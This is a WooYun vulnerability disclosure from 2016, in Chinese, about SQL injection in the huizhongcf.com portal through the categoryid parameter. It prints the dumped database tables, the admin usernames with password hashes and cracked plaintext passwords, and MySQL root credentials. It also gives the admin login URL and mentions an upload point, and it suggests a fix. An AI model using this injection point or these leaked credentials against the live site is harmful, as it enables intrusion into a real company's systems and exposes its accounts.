漏洞概要 关注数(2) 关注此漏洞
缺陷编号: WooYun-2016-192647
漏洞标题: 汇中财富门户网站SQL注入漏洞,可登录后台
相关厂商: 汇中财富
漏洞作者: 路人甲
提交时间: 2016-04-05 15:40
公开时间: 2016-05-20 15:40
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 20
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系
Tags标签: 无
漏洞详情
披露状态:
2016-04-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
rt
详细说明:
http://www.huizhongcf.com/about/yunyingshujutext.html?categoryid=53&id=438
参数:categoryid
DBA权限
Database: ftphzcf
[17 tables]
+-----------------------+
| adminuser |
| logrecord |
| tb_ad |
| tb_advertisement |
| tb_advertisementstype |
| tb_area |
| tb_global |
| tb_goods |
| tb_hzlanmu |
| tb_lanmu |
| tb_leaveword |
| tb_menu |
| tb_newlist |
| tb_news |
| tb_rongyu |
| tb_tag |
| tb_yuyue |
+-----------------------+
Database: ftphzcf
Table: adminuser
[5 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| u_adddate | datetime |
| u_admin | int(11) |
| u_id | mediumint(9) |
| u_name | varchar(255) |
| u_pwd | varchar(255) |
+-----------+--------------+
明文密码:
Database: ftphzcf
Table: adminuser
[8 entries]
+---------------------+---------+------+-------------------+--------------------
-----------------------------------+
| u_adddate | u_admin | u_id | u_name | u_pwd
|
+---------------------+---------+------+-------------------+--------------------
-----------------------------------+
| 2013-01-24 18:51:17 | 1 | 2 | tlshow | 92682ec88c76a47981a
36929ea33433a082dacb4 |
| 2015-08-04 16:36:53 | 1 | 3 | huizhongcf | 0211741fb783975439e
99b767ed22335be1f9135 |
| 2015-09-16 01:38:07 | 4 | 6 | huizhongjiangtang | 7c222fb2927d828af22
f592134e8932480637c0d (12345678) |
| 2015-09-16 01:44:56 | 3 | 7 | huizhongnews | 7c222fb2927d828af22
f592134e8932480637c0d (12345678) |
| 2015-10-16 03:12:07 | 2 | 9 | huizhongzhaopin | 1f4a04e5543d8760660
bb080226040b987b88d47 (1122334455) |
| 2015-10-16 03:42:02 | 5 | 10 | huizhongchujie | 7c222fb2927d828af22
f592134e8932480637c0d (12345678) |
| 2015-10-16 03:42:30 | 6 | 11 | huizhongjiekuan | 7c222fb2927d828af22
f592134e8932480637c0d (12345678) |
| 2015-10-19 06:44:58 | 7 | 12 | huizhongyunying | 1f2a1365ff49537b1a4
1c7cc1bbafad4d166fe86 |
+---------------------+---------+------+-------------------+--------------------
-----------------------------------+
数据库user
Database: mysql
Table: user
[6 entries]
+---------+--------------+--------------------------------------------------+
| user | host | password |
+---------+--------------+--------------------------------------------------+
| root | localhost | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B (root) |
| root | guanwang-new | <blank> |
| root | 127.0.0.1 | <blank> |
| root | ::1 | <blank> |
| <blank> | localhost | <blank> |
| <blank> | guanwang-new | <blank> |
+---------+--------------+--------------------------------------------------+
漏洞证明:
http://www.huizhongcf.com/winadmin/login.php
使用上面注入出的管理员账号密码登录:
有上传点
修复方案:
过滤特殊字符,设置密码复杂度策略,招个安全专员。。
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-04-25 09:50
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
评论